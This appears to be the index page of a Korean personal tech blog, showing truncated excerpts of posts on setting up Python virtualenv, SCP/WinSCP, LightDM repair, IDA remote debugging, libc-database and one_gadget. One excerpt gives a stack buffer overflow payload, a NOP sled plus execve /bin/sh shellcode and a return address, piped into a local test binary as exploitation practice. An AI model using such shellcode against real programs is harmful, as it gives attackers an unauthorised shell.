만두만두

cuckoo sandbox를 설치하면서 기존 존재하던 python 모듈들이 높아진 python 버전과 충돌을 발생시켜서 참 난감했었다. 이를 해결하기 위해서 몇 몇 자료들을 뒤져보니 마치 anaconda 처럼 독립적으로 분리된 python 환경을 만들어 해결하는 방법들을 알게되었다. python virtualenv라고 하는 이 모듈은 각 각의 어플리케이션에 따라 다른 python 환경을 제공해줌으로써, python 라이브러리의 차이에 발생하는 crash들을 사전에 방지할 수 있다. 설치 > pip install virtualenv # python 2> pip3 install virtualenv # python 3 사용법 python 2> python -m virtualenv [env name] # 현재 ..

(python -c 'print "\x90"*232 +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\xef\xbe\xad\xde" + "A"*4 + "\x04\xfa\xff\xbf"';cat)|./test요렇게 하면 안되는게 shellcode랑 0xdeadbeef랑 구분되게 해주지 않으면 0xdeadbeef 부분까지 code로 알아먹기 때문에 shellcode가 정상적으로 작동이 되지 않음. (python -c 'print "\x90"*222 +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\..

우선 설치는 저번 포스팅을 참조하도록 합시당 (윈도우 상에서 설치합니다. scp는 리눅스에서 사용하는 프로토콜이므로 윈도우 상에서 scp 통신을 하려면 특별한 도구가 필요합니다.)http://chp747.tistory.com/129?category=716904 설치 뒤, 이러저러한 명령어들로 제대로 통신 환경이 구축됬는지 확인해봅시당.> ssh # scp는 ssh 프로토콜 기반의 통신이므로 제대로 설치되었는지 확인합니다.> scp # scp가 제대로 실행되는지 확인합니다.> dpkg -l | grep ssh # openssh-server 가 제대로 설치되었는지 확인합니다.> sudo service ssh start (혹은 restart) # ssh 서비스가 제대로 실행되고 있는지 실행해봅니다. ifcon..

윈도우 리눅스 간의 파일복사를 하기 위해서 scp를 사용하려 한다.scp는 Secure Copy Protocol 이라고 하는 로컬 호스트와 원격 호스트간의 안전한 파일 복사를 위한 프로토콜이다. ssh 프로토콜을 이용하여 안전하게 파일 복사를 수행할 수 있다. scp는 리눅스 상에서 사용되는 도구이기 때문에, 윈도우와 scp로 통신을 하려면 윈도우에서는 이 프로토콜을 변환해줄 특별한 도구가 필요하다. WinSCP라는 도구를 사용하여 윈도우 상에서도 리눅스와 scp 통신을 수행할 수 있다.https://winscp.net/download/WinSCP-5.13.1-Setup.exe위의 링크에서 설치파일을 다운로드 받을 수 있다. 윈도우 상에서는 그냥 설치 뒤, 리눅스의 로컬 ip 주소를 적어 접속하면 되는데..

The system is running in low-graphics mode 라는 창이 뜨고 뭐 이러저러한 경고 창들이 뜨면서 x-server 에 이상이 생겼었다. 스냅 샷이라는 최후의 수단이 있었지만, 작성한 페이로드들이 아까워서 다른 방법을 찾고 있었다...따흐흑 사용자 계정 명을 바꾸면서 생긴 문제같은데 > sudo sh -c 'echo "greeter-show-manual-login=true" >> /etc/lightdm/lightdm.conf'아무래도 이 명령어를 사용하다 문제가 발생한 것 같다. lightdm은 우분투에서 디스플레이를 담당하고 있는데, 내가 이걸 잘못 건드려서 GUI 환경 구현에 문제가 생긴 것으로 보인다. 참고 : https://wiki.ubuntu.com/LightDM 슬프..

IDA elf file debug IDA에서 elf 파일을 가상머신(guest OS)의 리눅스를 이용하여 디버깅 해 봅시담.먼저, IDA 폴더 안에 있는 server 파일을 게스트 OS에서 실행시켜야 합니다. IDA 설치 시 생성되는 폴더 안의 dbgsrv 디렉토리에 있는 linux_server 와 linux_server64 파일을 게스트 OS에 복사해줍니담. [복사]서버 파일을 실행시켜주면, 위와 같은 화면을 볼 수 있는뎅여 테스트로 64비트의 elf 파일을 디버깅 해 볼 것이니, linux_server64 파일을 실행시켜 줍니당 그 뒤 다른 터미널을 열든지 해서, ifconfig 명령어를 통해 게스트 OS의 IP를 알아냅니다. 제 OS에서는 192.168.92.128 이넵여 IDA로 돌아와서, 분석할..

서브라임 텍스트 설치. 공식 사이트 참고. https://www.sublimetext.com/docs/3/linux_repositories.html

libc database를 설치합시닷. > git clone https://github.com/niklasb/libc-database.git libc-database 폴더가 생기면 폴더로 들어가서, 먼저 > ./get 명령어를 이용해 라이브러리 database 를 업데이트 합니닷. 사용법 참고.http://kaspyx.tistory.com/86http://9oat.tistory.com/3

으아아아아아아아ㅏ아아ㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏ 원가젯 겨우 설치햇다. ubuntu 16.04> sudo apt-get install software-properties-common> sudo apt-add-repository -y ppa:rael-gc/rvm> sudo apt-get update> sudo apt-get install rvm terminal 의 profile 설정에서 Run command as a login shell 해주고, 재부팅이나 로그아웃을 해준다. > rvm install ruby 루비까지 설치해주면 이제 gem을 사용할 수 있다! > gem install one_gadget 참고 : https://github.com/rvm/ubuntu_rvm [+] ubuntu 18.04이 시점에서는..

참고하며 할 것.http://hochulshin.com/ubuntu-1604-hangul/ 먼저 한글 패키지를 설치한다.> sudo apt-get install fcitx-hangul설치 완료 뒤, System Settings의 Language Support 에 들어가면 또 설치 창이 나오는데 여기까지 완료 후, 입력 방식을 fcitx 로 바꿔준다. 완료되었으면 재부팅하고, 후의 과정을 천천히 따라간다. 노트북에서는 한/영 키가 alt로 인식이 되므로 이를 방지하기 위해, 위와 같이 세팅해준다. 여기서 Configure Current Input Method 를 선택, 역시 위와 같은 상태로 세팅한다. 여기서 +에서 한글이 뜨지 않는다면, 맨 처음 한글 패키지 설치과정 상에서 문제가 발생한 것이므로 다시 ..